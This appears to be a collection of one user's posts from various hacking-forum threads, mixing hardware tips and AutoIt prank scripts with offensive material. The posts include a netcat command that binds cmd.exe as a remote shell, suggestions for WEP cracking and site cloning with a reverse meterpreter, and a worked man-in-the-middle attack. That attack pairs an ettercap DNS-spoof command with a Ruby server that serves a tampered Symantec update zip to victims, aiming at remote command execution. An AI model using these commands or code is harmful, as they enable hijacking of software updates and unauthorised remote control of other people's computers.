[Question About Gathering Info]

Do me next

[Pci Processor?]

Get amd 6 core, the most bang for your buck , u will love it with a good card

And solid state hard drive

My Linux boots up in like 1 second

[Droid, Usb Dongle Wifi Card Alternitave]

I just got a droid thunderbolt htc... i have not yet rooted but im curious, could you plug in a wifi adapter and install the linux drivers on a droid then start cracking wep and maybe a stronger sniffer

http://cgi.ebay.com/WiFi-Adapter-Plug-Play-Linux-WiFi-Antenna-RTL-8187L-/200615641597?pt=LH_DefaultDomain_0&hash=item2eb59fc1fd

[Faking Certain Webpages As Mitm]

Once you figure out dnspoof, check out SET website cloner with java ap, reverse meterpreter

[Practical Joke Question]

Wine works with autoit

It Can be done just as easy with ruby,perl,python

[Practical Joke Question]

Auto scripting is fun and easy to learn

While 1

If is_pressed("j") then

Send(" {backspace} im gay")

End

Install autoit and check out winzip tutorial

[Cmd Access Remotely Accross Wlan?]

Nc -l -p 666 -d cmd.exe

[Small Home Server]

im not sure the why you want it hooked to a tv, maybe explain...

i recommend xrdp

[Possible To Wake Up Computer Via Txt Message?]

this could be a fun first timers project. you should check out the scripting language autoit.

if (window exists "instant messenger" with text("power on") then execute("net system power on")

the syntax here is improper, this can be done with only a few lines of code with autoit

you should install autoit and check out the win zip tutorial

I'm sure you will have a lots of fun.

[Small Home Server]

Sudo apt-cache search rdp l grep server

[Mitm Tcp Dump. Spoof Symantic Update.zip]

here is a quick update on what i have done so far... i was going to make a video but i see no need... the client successfully downloads the modified zip file from my computer during the dns spoof (screenshot of wireshark) i just need to modify the zip packages contents to trigger execution...

sudo ettercap -T -F filter.ef -P dns_spoof -M arp // //

first thing is the ettercap filter drops encryption for more plaintext (not sure if its needed for this situation but i like to use it) 
dns_spoof: [liveupdate.symantecliveupdate.com] spoofed to [192.168.1.104]

sudo ruby exploit.rb

(its something i put together in a few minutes, dont judge me ,-P

require 'socket'            #SERVER
server = TCPServer.open(80)  
loop {                      
  client = server.accept    
  print client.read(100) #should recive /get /minitri.flg

  client.puts("HTTP/1.1 200 OK
Content-Length: 1
Content-Type: text/plain
Last-Modified: Fri, 29 Jul 2005 20:24:32 GMT
ETag: "+'"'+"1-42ea9080"+'"'+"
Accept-Ranges: bytes
Date: Sun, 15 May 2011 01:52:21 GMT
Connection: keep-alive
Cache-Control: public,must-revalidate,max-age=1800\n\r\n\r")

print client.read(100) #should recive GET /update symnetc from client

client.print("HTTP/1.1 200 OK
Content-Type: application/zip
Last-Modified: Sun, 15 May 2011 21:16:04 GMT
ETag: W/"+'"'+"15a1-4dd04294"+'"'+"
Accept-Ranges: bytes
Date: Sun, 15 May 2011 20:50:18 GMT
Connection: keep-alive
Cache-Control: public,must-revalidate,max-age=240\n\r\n\r")

#now send payload
	file = open('/home/bigmac/out.zip', "rb") # new evil update 
	fileContent = file.read
	client.print(fileContent)

  #client.print "Closing the connection. Bye!"
 # client.close                 # Disconnect from the client
}

wireshark screenshot of the zipfile downloaded 192.168.1.102 <---> 192.168.1.104

img838.imageshack.us/i/screenshotwireshark.png

... i should post the zipfile, im sure all that is needed is changing a few numbers around to trigger execution

[Mitm Tcp Dump. Spoof Symantic Update.zip]

ettercap, filter to drop encryption for more plain text... i fixed my problem with extracting the file ,-)

instead of pasting to text editor i just nc

netcat xxx.xxx.xx 80 > out.zip
GET /streaming/norton$202009$20streaming$20virus$20definitions_1.0_symalllanguages_livetri.zip HTTP/1.1.
If-Modified-Since: Sun, 08 May 2011 03:51:51 GMT.
Cache-control: max-age=0.
Cache-Control: no-cache.
Cache-Control: max-stale=0.
Cache-Control: min-fresh=1000.
Accept: */*.
HOST: liveupdate.symantecliveupdate.com.
User-Agent: +V2Ga/n+ZIRfedhlw5VItU2dHhkjA/GTQAAAAALUE.
Connection: Keep-Alive.

i open out.zip with text editor and removed the response header field from the top of the file and the file extracts just fine ,-)

i would really like to share more in-depth because this looks promising...

one of the files contents looks like this, one line

MOVE([TempDir],%StreamDefDir%)

i think this could give me sorta remote command execution

a quick test would be 'ping 192.168.1.101' (my labtop ip)

i found this log some one posted and now gives me a better view of whats going on... hxxp://community.norton.com/norton/attachments/norton/nis_feedback/92741/1/log.lu2.txt

[Mitm Tcp Dump. Spoof Symantic Update.zip]

Maybe I could get some ones opinion, I have captured a get request like /get symtec/id/dir/update.zip

I can reproduce this get request with ruby sockets and receive the binary data of the zip file. I saved this data and tried to extract its contents but it fails.

I hope to write my own evilgrade style exploit. Right now I'm on my Droid, I will post this get request and the binary data tonight. Any thoughts on how to properly handle this zip file please share